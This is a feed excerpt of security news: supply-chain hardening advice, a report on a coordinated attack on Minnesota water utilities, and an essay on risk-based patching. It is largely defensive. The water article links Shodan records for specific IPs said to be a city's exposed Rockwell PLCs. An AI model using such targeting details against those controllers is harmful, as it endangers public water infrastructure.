<p role="presentation"><strong>Workflow Trigger Governance (pull_request_target): </strong><span>Strictly limit and secure the use of highly privileged triggers such as pull_request_target in automated environments. Multiple prominent supply chain campaigns have actively exploited vulnerable workflows using this trigger as their initial entry vector.</span></p>
</li>
</ul>
<h4><span>Infrastructure Protection</span></h4>
<ul>
<li aria-level="1">
<p role="presentation"><strong>Zero Trust and Least Privilege:</strong><span> Maintain rigorous control over managed service providers (MSPs) and third-party vendors by enforcing role-based access control (RBAC), multifactor authentication (MFA), and frequent audits of access rights.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Network Micro-Segmentation:</strong><span> Segregate vital hardware and software from the rest of the enterprise network. Use allow-list-only firewall rules to block unauthorized outbound traffic and disrupt command-and-control (C2) activities.</span></p>
</li>
</ul>
<h4><span>Secure Development Ecosystems</span></h4>
<ul>
<li aria-level="1">
<p role="presentation"><strong>Pipeline and Sandbox Isolation:</strong><span> Ensure that testing environments, CI/CD pipelines, and informal scripting sandboxes are physically or logically isolated from production assets.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Artifact Management:</strong><span> To secure the supply chain, organizations can integrate Google's </span><a href="https://cloud.google.com/security/products/assured-open-source-software"><span>Assured Open Source Software</span></a><span> into their internal workflows to defend against dependency confusion and malicious hijacking. This process provides "provenance" cryptographically signed evidence that the code has not been tampered with and originates from a verified source thereby establishing a higher level of trust for third-party dependencies.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Quarantine Gates:</strong><span> Require all binaries, packages, and container images to be hosted in monitored internal repositories. To defend against zero-day dependency hijackings, implement localized "quarantine gates" by enforcing cooling windows on newly published third-party assets.</span></p>
</li>
</ul>
<ul>
<li aria-level="1">
<p role="presentation"><strong>Lifecycle Script Sandboxing (ignore-scripts)</strong><span>: Mitigate the critical threat of arbitrary code execution by disabling the automatic running of package install scripts. Attackers commonly hijack dependencies and add malicious post-installation execution scripts to steal credentials from developer environments and runners during routine installs. Organizations should mandate </span><code>ignore-scripts=true</code><span> in their repository-level .npmrc files and configure native allowlists, such as pnpm's </span><code>onlyBuiltDependencies</code><span>, to restrict execution exclusively to verified, essential tools.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Software Composition Analysis (SCA) with Google OSV-Scanner:</strong><span> Integrate Google's open source </span><a href="https://github.com/google/osv.dev" rel="noopener" target="_blank"><span>OSV-Scanner</span></a><span> tool into CI/CD build pipelines to continuously scan project dependencies for known security flaws. This tool provides an officially supported frontend to the OSV.dev database that maps a project's list of dependencies with the specific vulnerabilities affecting them.</span></p>
</li>
<ul>
<li aria-level="2">
<p role="presentation"><strong>High-Fidelity Vulnerability Detection</strong><span>: Unlike traditional scanners that rely on imprecise name matching, the OSV schema stores vulnerability data in a machine-readable format that maps unambiguously onto version ranges and commit hashes. This results in fewer false positives and produces highly actionable remediation notifications, significantly reducing development team triage overhead.</span></p>
</li>
</ul>
<li aria-level="1">
<p role="presentation"><strong>Authoritative &amp; Collaborative Threat Intel:</strong><span> The underlying OSV.dev database aggregates high-quality threat intelligence from authoritative open sources, allowing the broader developer community to suggest continuous improvements. Utilizing OSV-Scanner helps developers identify impactful third-party open source vulnerabilities in their applications and focus remediation on genuine risks.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Hardware-Backed Key Protection:</strong><span> Secure code-signing certificates using Hardware Security Modules (HSMs) or vaulting solutions. Monitor public transparency ledgers and logs to detect any unauthorized certificate activity.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Hardened Distribution Points:</strong><span> Audit and lock down software delivery channels, such as Content Delivery Network (CDN) endpoints and FTP servers, to ensure legitimate binaries cannot be replaced by compromised payloads.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Audit NPM Package Maintainer Accounts for Stale or Expired Recovery Email Domains: </strong><span>Expired maintainer email domains are a critical risk because attackers can purchase them to intercept password reset emails, take over the package registry account, and publish malicious code to downstream users. To identify vulnerable packages, organizations can perform the following:</span></p>
</li>
<ul>
<li aria-level="2">
<p role="presentation"><span>Deploy automated scanning tools to audit the entire dependency tree and verify the domain name system (DNS) resolution and registration status of all maintainer email domains.</span></p>
</li>
<li aria-level="2">
<p role="presentation"><span>For defense-in-depth, pipelines must disable package execution scripts and employ cold periods.</span></p>
</li>
<li aria-level="2">
<p role="presentation"><span>Use by default ephemeral, single-use runners to prevent compromised packages from accessing persistent build environments. </span></p>
</li>
<li aria-level="2">
<p role="presentation"><span>Isolate runners in a restricted network segment with strict egress filtering blocks any unauthorized connection to external domains even if an active exploit is triggered.</span></p>
</li>
</ul>
</ul>
<h4><strong>Integration with Native Ecosystem Guardrails    </strong></h4>
<ul>
<li aria-level="1">
<p role="presentation"><span>These organization-controlled quarantine policies must operate in conjunction with native platform-level security updates to achieve a Defense-in-Depth posture. Relying solely on client-side configurations or automated update tools in isolation creates single points of failure. The following native platform controls must be orchestrated alongside standard controls:</span></p>
</li>
</ul>
<ul>
<li aria-level="1">
<p role="presentation"><a href="https://github.blog/security/supply-chain-security/the-case-for-a-cooldown-why-dependabot-now-waits-before-issuing-version-updates/" rel="noopener" target="_blank"><strong>Dependabot Native Cooldowns (July 2026)</strong></a><strong>:</strong><span> Dependabot now enforces a default three-day cooldown on version updates to allow for the public discovery of upstream compromises (such as the historical chalk and debug hijackings) before automated Pull Requests are generated].</span></p>
</li>
<li aria-level="1">
<p role="presentation"><a href="https://blog.pypi.org/posts/2026-07-22-releases-now-reject-new-files-after-14-days/" rel="noopener" target="_blank"><strong>PyPI Server-Side Immutability (July 2026)]</strong></a><strong>:</strong><span> PyPI now natively rejects new file uploads to any release older than 14 days. This prevents adversaries possessing compromised tokens from retroactively poisoning legacy, pinned dependencies (as observed in the LiteLLM and Telnyx compromises) .</span></p>
</li>
<li aria-level="1">
<p role="presentation"><a href="https://github.blog/changelog/2026-06-09-upcoming-breaking-changes-for-npm-v12/" rel="noopener" target="_blank"><strong>npm v12 Install-Time Defaults (July 2026)</strong></a><span>: npm v12 disables all lifecycle scripts by default (</span><code>allowScripts: off)</code><span> , replacing manual, workflow-level ignore flags with explicit, commit-verified package allow-lists </span></p>
</li>
</ul>
<p><span>By explicitly aligning baseline configurations including .npmrc and pip.conf registry pinning, immutable installation protocols via npm ci, and runner isolation with these native platform-level guardrails, while committing to the continuous evaluation and adoption of new </span><a href="https://github.blog/changelog/?label=supply-chain-security" rel="noopener" target="_blank"><span>upstream security features</span></a><span> as they are released, the organization establishes a resilient, multi-layered security boundary across the entire software supply chain</span></p>
<h4><span>Continuous Verification, Monitoring, and Response</span></h4>
<h5><em><span>Automated Ingestion and Validation</span></em></h5>
<ul>
<li aria-level="1">
<p role="presentation"><strong>Automate SBOM Management:</strong><span> Implement a Software Bill of Materials (SBOM) for all third-party and internal software. This enables continuous monitoring for emerging vulnerabilities like Log4j through automated cross-referencing. Automate and scale this process by feeding SBOMs into central vulnerability management platforms that continuously cross-reference deployed inventory against newly disclosed exploits.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Security Analysis Integration:</strong><span> Incorporate automated dynamic application security testing (DAST) and static application security testing (SAST) tools within development pipelines to identify and block compromised third-party code before it is compiled.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Verification of Cryptographic Integrity:</strong><span> Prior to installing updates, use automated systems to validate digital signatures and hashes against vendor-provided specifications.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Implement autonomous security verification</strong><span>: Organizations should look to integrate advanced security workflows directly into their CI/CD pipelines. These systems can behaviorally evaluate threats by executing simulations in isolated sandboxes, cross-reference those flags with cloud context to determine a flaw's actual reach, and automatically generate tested code patches to rapidly remediate verified risks at scale.</span></p>
</li>
</ul>
<h5><em><span>Proactive Threat Hunting and Monitoring</span></em></h5>
<ul>
<li aria-level="1">
<p role="presentation"><strong>Egress and Proxy Analysis:</strong><span> Establish network traffic baselines to identify suspicious egress flows to external repositories or unrecognized Internet Protocol (IP) addresses.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Comprehensive Endpoint Security:</strong><span> Utilize endpoint detection and response (EDR) tools across infrastructure and developer workstations to detect post-execution malicious activities from supply chain compromises.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Log Aggregation and Alerting:</strong><span> Unified log management should alert on the following anomalies:</span></p>
</li>
<ul>
<li aria-level="2">
<p role="presentation"><span>Development Systems: Watch for unauthorized code changes, build parameter adjustments, or irregular user activity.</span></p>
</li>
<li aria-level="2">
<p role="presentation"><span>CI/CD Integrity: Alert on unauthorized workflow modifications or anomalous triggers (e.g., repository_dispatch) that bypass standard code-review gates.</span></p>
</li>
<li aria-level="2">
<p role="presentation"><span>Injection Detection: Monitor logs for shell-escape characters or command-substitution patterns within untrusted input variables.</span></p>
</li>
<li aria-level="2">
<p role="presentation"><span>Credential Misuse: Track authentication hits on long-lived static keys from unrecognized IP addresses or regions.</span></p>
</li>
<li aria-level="2">
<p role="presentation"><span>Physical Assets: Record all firmware modifications, including installation status and source information.</span></p>
</li>
</ul>
</ul>
<h5><em><span>Incident Response Strategies</span></em></h5>
<ul>
<li aria-level="1">
<p role="presentation"><strong>Specific Supply Chain Playbooks:</strong><span> Perform tabletop exercises and document response plans for:</span></p>
<ul>
<li aria-level="2">
<p role="presentation"><strong>Upstream Package Takeover:</strong><span> Maintainer account takeover (ATO) on public registries leading to direct runtime application code manipulation</span></p>
</li>
<li aria-level="2">
<p role="presentation"><strong>Dependency Confusion Exploits</strong><span>: Malicious registration of lapsed administrative recovery domains or unscoped internal namespaces on public registries to hijack local developer and build runner installations.</span></p>
</li>
<li aria-level="2">
<p role="presentation"><strong>Automated Pipeline Harvesting:</strong><span> Pipeline poisoning of CI/CD environments via runner exploitation to harvest credentials and perform unauthorized package publication.</span></p>
</li>
<li role="presentation"><strong>Developer Workstation &amp; IDE Compromise: </strong><span>Targeted social engineering, malicious IDE extensions, or typosquatted local dependencies designed to exfiltrate private cryptographic keys, API tokens, and local session credentials.</span></li>
</ul>
</li>
<li aria-level="1">
<p role="presentation"><strong>Operational Re-evaluation:</strong><span> Create processes for immediate vendor re-mapping and security re-assessment during industry-wide security events.</span></p>
</li>
</ul>
<p><span>Recommendations for mitigation strategies are also available publicly via:</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>Google's </span><a href="https://cloud.google.com/blog/products/application-development/google-introduces-slsa-framework"><span>Supply-chain Levels for Software Artifacts (SLSA)</span></a><span> </span></p>
</li>
<li aria-level="1">
<p role="presentation"><a href="https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-161r1.pdf" rel="noopener" target="_blank"><span>Cybersecurity Supply Chain Risk Management Practices for Systems and Organizations</span></a><span> (NIST SP 800-161 Rev. 1) from the US National Institute of Standards and Technology (NIST)</span></p>
</li>
<li aria-level="1">
<p role="presentation"><a href="https://media.defense.gov/2022/Sep/01/2003068942/-1/-1/0/ESF_SECURING_THE_SOFTWARE_SUPPLY_CHAIN_DEVELOPERS.PDF" rel="noopener" target="_blank"><span>Securing the Software Supply Chain: Recommended Practices Guide for Developers</span></a><span> from the US National Security Agency (NSA)</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>WIZ SDLC Infrastructure Threat Framework (SITF) </span><a href="https://www.wiz.io/blog/sitf-sdlc-threat-framework" rel="noopener" target="_blank"><span>SDLC Infrastructure Threat Framework</span></a></p>
</li>
</ul>
<h3><span>Acknowledgements</span></h3>
<p><span>This analysis would not have been possible without the assistance of Matthew McWhirt and Michael Veal. </span></p></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[CISO's guide to data obfuscation]]></title>
<description><![CDATA[With so many services requiring access to sensitive data, encryption alone is not enough. Data obfuscation has evolved into a core element of modern cybersecurity architecture.]]></description>
<link>https://tsecurity.de/de/3697828/it-security-nachrichten/cisos-guide-to-data-obfuscation/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3697828/it-security-nachrichten/cisos-guide-to-data-obfuscation/</guid>
<pubDate>Mon, 03 Aug 2026 00:07:58 +0200</pubDate>
<content:encoded><![CDATA[With so many services requiring access to sensitive data, encryption alone is not enough. Data obfuscation has evolved into a core element of modern cybersecurity architecture.]]></content:encoded>
</item>
<item>
<title><![CDATA[A coordinated attack hit 30+ Minnesota water systems. Who did it, and what does a Rockwell notice add to the picture?]]></title>
<description><![CDATA[A coordinated cyberattack that targeted more than 30 Minnesota community water systems has alarmed industrial cybersecurity experts, not because it caused widespread disruption, but because it appears to represent the first distributed campaign against dozens of small utilities linked by a common...]]></description>
<link>https://tsecurity.de/de/3697837/it-security-nachrichten/a-coordinated-attack-hit-30-minnesota-water-systems-who-did-it-and-what-does-a-rockwell-notice-add-to-the-picture/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3697837/it-security-nachrichten/a-coordinated-attack-hit-30-minnesota-water-systems-who-did-it-and-what-does-a-rockwell-notice-add-to-the-picture/</guid>
<pubDate>Mon, 03 Aug 2026 00:07:58 +0200</pubDate>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">A coordinated cyberattack that targeted more than 30 Minnesota community water systems has alarmed industrial cybersecurity experts, not because it caused widespread disruption, but because it appears to represent the first distributed campaign against dozens of small utilities linked by a common operational technology weakness.</p>



<p class="wp-block-paragraph">While the affected communities reported that drinking water remained safe and disruptions were limited, security researchers say the incident marks another escalation in a months-long campaign targeting US water infrastructure amid heightened geopolitical tensions with Iran.</p>



<p class="wp-block-paragraph">“This is a first-of-its-kind distributed attack on water utilities,” <a href="https://www.linkedin.com/in/markusmuellerics/">Markus Mueller</a>, field CISO at Nozomi Networks, tells CSO. “Based on the publicly available information, it was clearly aimed at disruption rather than financial gain.”</p>



<h2 class="wp-block-heading">What happened?</h2>



<p class="wp-block-paragraph">Minnesota IT Services <a href="https://mn.gov/mnit/media/blog/?id=38-761869">disclosed</a> that the water systems experienced coordinated cyber activity over a two-day period from July 26 to July 27. The city of Braham, with roughly 1,700 people in Isanti County, <a href="https://www.mprnews.org/story/2026/07/27/braham-cyberattack-knocked-water-system-offline">suffered</a> the most visible operational impact after shutting down portions of its water system for roughly two hours while operators regained control of affected systems.</p>



<p class="wp-block-paragraph">The city of Plymouth <a href="https://www.plymouthmn.gov/Home/Components/News/News/8977/542">disconnected</a> cellular-connected equipment at two water towers and multiple wastewater lift stations to stop the intrusion and prevent the attackers from regaining access while the equipment was reconfigured. The city of <a href="https://www.startribune.com/plymouth-south-st-paul-water-system-cyber-attack/601872810">South St. Paul</a> said some automated controls were affected, and the city of Maple Plain declared a local state of emergency to expand its response.</p>



<p class="wp-block-paragraph">The incident comes just days after CISA, the FBI, NSA and EPA <a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa26-097a">expanded</a> an advisory warning that Iranian-affiliated cyber actors continue targeting programmable logic controllers (PLCs) used throughout US critical infrastructure, including water systems.</p>



<p class="wp-block-paragraph">“CISA is currently observing a significant increase in cyber threat actors targeting programmable logic controllers at water utilities,” CISA Acting Director Nick Andersen said in a statement provided to CSO. “We urge critical infrastructure owners and operators to remove publicly exposed PLCs and other operational technology from the internet as soon as possible.”</p>



<p class="wp-block-paragraph">“We also encourage all organizations to review the latest guidance on CISA.gov and to report suspected incidents or anomalous activity to us for further support,” Andersen said.</p>



<h2 class="wp-block-heading">More than another utility hack</h2>



<p class="wp-block-paragraph">Experts agree that the attacks stand apart from previous incidents because they were coordinated across numerous utilities rather than focused on a single victim.</p>



<p class="wp-block-paragraph">Nozomi’s Mueller believes that this coordination strongly suggests investigators will eventually identify some technical thread connecting the affected communities.</p>



<p class="wp-block-paragraph">“To be this sector-specific,” he says, “my assumption would be that there is something that ties these together beyond simply being Minnesota water utilities.” He thinks investigators may ultimately discover a shared systems integrator, communications architecture or other common infrastructure that made the utilities collectively vulnerable.</p>



<p class="wp-block-paragraph"><a href="https://www.linkedin.com/in/ronniefabela/">Ron Fabela</a>, an industrial control systems researcher who closely tracks attacks against operational technology, reached a similar conclusion after examining publicly available information.</p>



<p class="wp-block-paragraph">“I searched Minnesota’s public IP space and didn’t find obvious exposed water infrastructure,” he says. “Many of these utilities use cellular communications, which makes them much harder to identify than internet-facing industrial systems.”</p>



<p class="wp-block-paragraph">That distinction could explain why dozens of geographically clustered utilities were affected while neighboring infrastructure apparently was not.</p>



<h2 class="wp-block-heading">The Rockwell connection</h2>



<p class="wp-block-paragraph">An additional development could prove significant as investigators continue examining the attacks.</p>



<p class="wp-block-paragraph">According to a source familiar with the federal investigation, authorities are examining whether vulnerable Rockwell Automation MicroLogix 1400 PLCs served as a common enabling factor in the campaign.</p>



<p class="wp-block-paragraph">Fabela ran a targeted Shodan search on Plymouth’s public IP space and found the city using at <a href="https://www.shodan.io/host/166.163.186.2">least</a> <a href="https://www.shodan.io/host/166.163.186.6">two</a> Rockwell Automation MicroLogix 1400 controllers.</p>



<p class="wp-block-paragraph">The possibility aligns with both recent federal warnings and a July 30 <a href="https://www.rockwellautomation.com/en-us/trust-center/security-advisories/advisory.SD1790.html">Rockwell Automation security advisory</a> addressing the MicroLogix 1400 family of controllers. Earlier federal guidance identified Rockwell Automation/Allen-Bradley PLCs among the industrial controllers being actively targeted by Iranian-affiliated threat actors before expanding the warning to additional PLC manufacturers.</p>



<p class="wp-block-paragraph">On July 30, amid the investigation into the Minnesota attacks, CISA issued <a href="https://www.cisa.gov/news-events/alerts/2026/07/30/cisa-urges-water-and-wastewater-systems-sector-protect-ot-against-activity-targeting-plcs">fresh guidance</a> urging water and wastewater utilities to remove publicly exposed PLCs and other operational technology from the internet as quickly as possible.</p>



<p class="wp-block-paragraph"><a href="https://www.tenable.com/profile/scott-caveza">Scott Caveza</a>, senior staff research engineer at Tenable, the first security organization to issue a <a href="https://www.tenable.com/blog/coordinated-cyberattack-on-minnesota-water-utilities-what-you-need-to-knowhttps:/www.tenable.com/blog/coordinated-cyberattack-on-minnesota-water-utilities-what-you-need-to-know">report</a> on the incident, cautioned that the timing alone does not establish causation. “The timing certainly makes it suspicious,” Caveza says. “Rockwell Automation devices have routinely been targeted by these groups before, so it’s definitely plausible.”</p>



<p class="wp-block-paragraph">If exposed PLCs did provide attackers with access, the implications extend beyond simple monitoring.</p>



<p class="wp-block-paragraph">“Depending on configuration,” Caveza explains, “an attacker could gain monitoring capability, manipulate what operators see, or in some circumstances modify operational settings.” Fortunately, manual safety controls built into most water facilities make catastrophic consequences considerably more difficult.</p>



<p class="wp-block-paragraph">The relatively quick recovery in Braham appears consistent with that assessment. Operators restored systems within roughly two hours, and no boil-water orders were issued.</p>



<p class="wp-block-paragraph">CISA’s July 30 alert did not identify the equipment involved in the Minnesota incidents or address whether Rockwell controllers played a role. However, the agency’s renewed emphasis on removing internet-exposed PLCs closely mirrors both Rockwell’s own mitigation guidance and one of the questions investigators are now examining: whether exposed Rockwell controllers provided a common avenue into multiple utilities.</p>



<h2 class="wp-block-heading">Attribution remains the biggest unanswered question</h2>



<p class="wp-block-paragraph">Federal agencies have stopped short of publicly identifying those responsible, although most experts believe Iranian-affiliated actors remain the leading suspects.</p>



<p class="wp-block-paragraph"><a href="https://www.linkedin.com/in/cynthia-kaiser-cyber/">Cynthia Kaiser</a>, former FBI cyber deputy director and now vice president of strategy and policy at Halcyon, says the attacks closely followed recent federal warnings describing an active Iranian campaign targeting operational technology.</p>



<p class="wp-block-paragraph">“You have the FBI and other US government agencies putting out an urgent warning about Iran targeting operational controls,” she tells CSO. “Then this larger coordinated campaign occurs. Geopolitically, Iran has the strongest motivation to conduct this kind of chaos-driven cyberattack.”</p>



<p class="wp-block-paragraph">Still, Kaiser acknowledges investigators lack a definitive technical smoking gun. Instead, she argues Iran increasingly benefits from what she calls “strategic ambiguity.”</p>



<p class="wp-block-paragraph">“They thrive in people suspecting it might be them but not knowing for sure,” she says. “That ambiguity complicates response and buys them time operationally.”</p>



<p class="wp-block-paragraph">That explanation may help resolve one of the attack’s biggest mysteries.</p>



<p class="wp-block-paragraph">Unlike previous campaigns by CyberAv3ngers and other Iranian-aligned hacktivist groups, no convincing public victory videos or detailed Telegram posts immediately appeared following the Minnesota attacks. In an unusual delay, an Iranian state publication <a href="https://wanaen.com/handala-launches-widespread-attack-on-minnesota-water-infrastructure/">attributed</a> the attack to threat group Handala only on July 29, days after the incident.</p>



<p class="wp-block-paragraph">Handala itself has been silent, even though it <a href="https://x.com/H4ND4L4/status/2081289467390771391?s=20">claimed credit</a> on X on July 26 for a cyberattack targeting the network infrastructure of SupraNet Communications, a major internet service provider based in Madison, Wisc.</p>



<p class="wp-block-paragraph">That Handala claimed credit for one attack days earlier but has said nothing about Minnesota deepens the mystery of its silence here.</p>



<p class="wp-block-paragraph">Fabela noted that absence stood out. “Neither Handala nor CyberAv3ngers has publicly claimed responsibility the way we’ve seen in previous campaigns,” he says. “Normally they post screenshots or proof. We haven’t seen that yet.”</p>



<p class="wp-block-paragraph">Mueller also found the silence unusual.</p>



<p class="wp-block-paragraph">“At the peak we were tracking more than a hundred Iranian splinter groups,” he says. “Then everything became very quiet. Even with renewed kinetic activity, we haven’t seen the same level of public boasting.”</p>



<h2 class="wp-block-heading">Lessons for water utilities</h2>



<p class="wp-block-paragraph">Whatever the final attribution, experts say the attacks reinforce an uncomfortable reality: Attackers often do not need sophisticated zero-day exploits to disrupt operational technology.</p>



<p class="wp-block-paragraph">Rather, they succeed because industrial control devices remain directly reachable from the internet, protected by weak credentials, or deployed without the network segmentation long recommended by federal agencies.</p>



<p class="wp-block-paragraph">Fabela summed up the irony this way: “Tying all these pieces together, it seems the threat actors are implementing the CISA-recommended actions for PLCs — without operator permission, of course: set a password, remove them from the internet. Joking, not joking.”</p>



<p class="wp-block-paragraph">“The guidance is pretty typical,” Caveza says. “Don’t connect these devices directly to the internet. These are things we hope would already be common knowledge—but unfortunately things happen.”</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Risk-based patching is the future. AI made it table stakes]]></title>
<description><![CDATA[CISA’s new Binding Operational Directive (BOD) 26-04 marks one of the most important changes to federal vulnerability management in years. Rather than requiring agencies to patch every critical vulnerability on the same timetable, the directive prioritizes remediation based on risk, with patch de...]]></description>
<link>https://tsecurity.de/de/3697845/it-security-nachrichten/risk-based-patching-is-the-future-ai-made-it-table-stakes/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3697845/it-security-nachrichten/risk-based-patching-is-the-future-ai-made-it-table-stakes/</guid>
<pubDate>Mon, 03 Aug 2026 00:07:58 +0200</pubDate>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">CISA’s new <a href="https://www.cisa.gov/news-events/directives/bod-26-04-prioritizing-security-updates-based-risk">Binding Operational Directive (BOD) 26-04</a> marks one of the most important changes to federal vulnerability management in years. Rather than requiring agencies to patch every critical vulnerability on the same timetable, the directive prioritizes remediation based on risk, with patch deadlines ranging from three days for the highest-risk vulnerabilities to deferral for those posing minimal risk. It’s a welcome evolution, but it brings us to the starting blocks, not the finish line.</p>



<p class="wp-block-paragraph">Security teams have long known that severity alone doesn’t determine risk. A CVSS score says little about whether a vulnerability is reachable from the Internet, is being actively exploited, can be automated or provides the attacker with control of the asset. BOD 26-04 acknowledges the contextual nature of risk by directing organizations to focus first on the exposures most likely to be exploited.</p>



<p class="wp-block-paragraph">However, AI is compressing every stage of the attack lifecycle, changing the threat landscape faster than vulnerability management practices can adapt. <a href="https://www.crowdstrike.com/en-us/blog/crowdstrike-2026-global-threat-report-findings/">CrowdStrike reports </a>that the average eCrime breakout (Initial Lateral Movement)  time has fallen to just 29 minutes, with the fastest observed breakout taking <strong><em>27 seconds</em></strong>. Once attackers establish a foothold, <a href="https://cloud.google.com/blog/topics/threat-intelligence/m-trends-2026">Mandiant found</a> they hand off access between operators in a median of 22 seconds.</p>



<p class="wp-block-paragraph">At the same time, AI itself is <a href="https://genai.owasp.org/initiatives/agentic-security-initiative/">growing as an attack surface</a>. Organizations are rapidly deploying copilots, browser agents, autonomous workflows and other AI-powered systems, introducing prompts, plugins, connectors and integrations that require protection.</p>



<p class="wp-block-paragraph">Against this backdrop, the directive’s three-day remediation window for the riskiest exposures looks less like an aggressive target and more like a luxury. </p>



<p class="wp-block-paragraph">Today’s attackers don’t simply exploit CVEs. They combine vulnerabilities with stolen identities, cloud misconfigurations, exposed APIs, SaaS weaknesses and increasingly AI systems to construct attack paths into critical assets. BOD 26-04 moves us forward, but AI requires defenders not simply to accelerate existing processes, but to rethink them.</p>



<h2 class="wp-block-heading">AI has changed the tempo and economics of cyberattacks</h2>



<p class="wp-block-paragraph">One of AI’s biggest advantages for attackers is its ability to automate work that previously required teams of human operators. Reconnaissance, vulnerability research, exploit generation, phishing, credential harvesting and even portions of lateral movement can now be accelerated or, in some cases, largely orchestrated by AI.</p>



<p class="wp-block-paragraph"><a href="https://www.anthropic.com/news/disrupting-AI-espionage">Recent research</a> has demonstrated autonomous agents carrying out much of the operational work in sophisticated cyber campaigns while humans supervise the broader objectives. As a result, campaigns become easier and less expensive to scale, more targets can be pursued simultaneously and attackers can test far more paths into an environment before defenders realize they’re being probed.</p>



<p class="wp-block-paragraph">For years, vulnerability management assumed that organizations had weeks, or even months, to identify, prioritize and remediate security issues. That assumption no longer reflects reality. Attackers routinely move from initial access to lateral movement in less than an hour, and vulnerabilities are increasingly exploited shortly after disclosure, and in some cases <a href="https://cloud.google.com/blog/topics/threat-intelligence/2025-zero-day-review">are weaponized</a> before defenders have even begun evaluating them.</p>



<p class="wp-block-paragraph">This is why CISA’s move toward risk-based remediation matters. Prioritizing vulnerabilities based on exploitability and operational risk gives defenders a much better chance of addressing the issues most likely to be used against them. But vulnerabilities represent only one piece of today’s exposure landscape.</p>



<h2 class="wp-block-heading">Modern attacks follow paths, not findings</h2>



<p class="wp-block-paragraph">Most security organizations still divide responsibilities across specialized teams. Vulnerability management focuses on CVEs. Identity teams concentrate on authentication and privilege. Cloud security addresses configuration. Application security reviews code.</p>



<p class="wp-block-paragraph">Attackers don’t encounter those same boundaries. Their objective is to reach valuable assets using whatever route is available. A campaign may begin with an exposed vulnerability, stolen credentials, excessive cloud permissions, a misconfigured SaaS application or a compromised AI agent. More often than not, several of those conditions are combined. For example, the 2026 Verizon Breach report found that while 31% of initial exploitation last year was a vulnerability, 39% of attack chains involved identity issues. In every notable breach, attackers chain together various types of exposures to advance inside networks.</p>



<p class="wp-block-paragraph">An attacker who compromises a low-privilege account may discover an over-permissioned identity, pivot through a cloud workload, exploit a vulnerable application and eventually gain access to sensitive business systems. None of those individual exposures may appear catastrophic when viewed independently. Together, they form a viable attack path.</p>



<p class="wp-block-paragraph">With breaches always a chain of various exposures, and vulnerabilities representing only part of the story of how breaches actually occur, this is where vulnerability-centric security begins to break down. CrowdStrike also reported a 42% year-over-year increase in vulnerabilities exploited, <em>before</em> vendors even announced them. That means organizations that are nose-to-the-grindstone closing   hundreds of high-severity findings will get breached because they lack the context needed to close off the most practical route an attacker would take to their critical assets.</p>



<p class="wp-block-paragraph">Organizations should assume breach and plan for the possibility that an attacker will eventually gain an initial foothold. Security architecture should be as segmented as possible and limit how far an adversary, or a compromised AI agent, can move after that initial compromise. And security controls should be validated continuously rather than assumed effective because they were successfully deployed. </p>



<p class="wp-block-paragraph">These principles shift attention away from individual findings and toward the conditions that enable successful attacks.</p>



<h2 class="wp-block-heading">How defenders can adapt: Continuous assessment and validation</h2>



<p class="wp-block-paragraph">One practical way to make this transition is to get serious about implementing a <a href="https://ctem.org/docs/what-is-continuous-threat-exposure-management">Continuous Threat Exposure Management (CTEM) program</a>, which establishes an ongoing process for understanding and reducing exposure.</p>



<p class="wp-block-paragraph">It starts with something many organizations still struggle to maintain: a current understanding of the environment. That means continuously mapping assets, identities, cloud infrastructure, SaaS applications, AI systems and the relationships between them. From there, security teams can identify exposures, prioritize them according to exploitability and business impact, validate whether they are actually reachable, and drive remediation across operational teams.</p>



<p class="wp-block-paragraph">This continuous cycle restores what Mandiant calls the <a href="https://services.google.com/fh/files/misc/the-defenders-advantage-two-solutions-guide.pdf">Defender’s Advantage.</a> Attackers must first discover an unfamiliar environment before they can exploit it. Defenders already have that knowledge – or should. The challenge is keeping it current as cloud services, identities, AI applications and business systems evolve daily.</p>



<h2 class="wp-block-heading"><a></a>Embed validation into the process</h2>



<p class="wp-block-paragraph">Security teams also need to verify that the exposures they’ve identified can actually be exploited and that remediation efforts have eliminated meaningful risk.</p>



<p class="wp-block-paragraph">That’s where adversary-aware exposure validation becomes an essential part of the process. Technologies such as breach-and-attack simulation, automated penetration testing and attack path analysis allow organizations to continuously test their environments using techniques that resemble real adversaries.</p>



<p class="wp-block-paragraph">Instead of asking whether a vulnerability exists, exposure validation answers more practical questions: Can an attacker reach it? Can they exploit it? Can they pivot from it to something the business actually cares about? Just as important, validation confirms whether remediation efforts have truly closed the door rather than simply reducing the number of findings on a dashboard.</p>



<h2 class="wp-block-heading">Prioritize the business, not the dashboard</h2>



<p class="wp-block-paragraph">Validation becomes even more valuable when combined with business context. A medium-severity weakness affecting a revenue-generating application, regulated data or critical operational system may represent greater organizational risk than multiple critical vulnerabilities affecting isolated development environments.</p>



<p class="wp-block-paragraph">Prioritizing validated exposures according to business impact gives security leaders a remediation strategy they can explain to executives in operational terms rather than technical ones. More importantly, it aligns defensive efforts with the attack paths most likely to affect the organization.</p>



